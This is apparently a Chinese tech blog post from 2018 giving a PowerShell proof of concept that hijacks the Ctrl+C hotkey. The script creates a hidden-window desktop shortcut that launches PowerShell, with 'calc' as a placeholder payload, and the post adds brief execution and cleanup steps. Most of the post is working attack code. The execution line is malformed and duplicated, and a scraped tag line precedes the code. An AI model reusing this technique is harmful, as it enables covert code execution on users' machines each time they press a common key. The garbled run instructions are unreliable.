簡單易用,用Powershell劫持Windows系統快捷鍵
阿新 • • 發佈:2018-02-04
post hot window div nbsp 快捷鍵 payload eat arguments POC:
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("desktop\desktoppayload.lnk") // 在桌面創建快捷方式按鈕
$Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" // 執行文件
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" // 設置快捷按鈕圖標
$Shortcut.hotkey = "ctrl+c" // 快捷鍵
$Shortcut.WindowStyle = ‘7‘ // 最小化執行,避免彈窗
$Shortcut.Arguments = ‘calc‘ // 執行參數
$Shortcut.Save()
執行方法:
保存poc,命令行執行
TYPE POC位置 | powershell.exe - profile - 刪除快捷圖標即可還原
保存poc,命令行執行
TYPE POC位置 | powershell.exe - profile - 刪除快捷圖標即可還原
簡單易用,用Powershell劫持Windows系統快捷鍵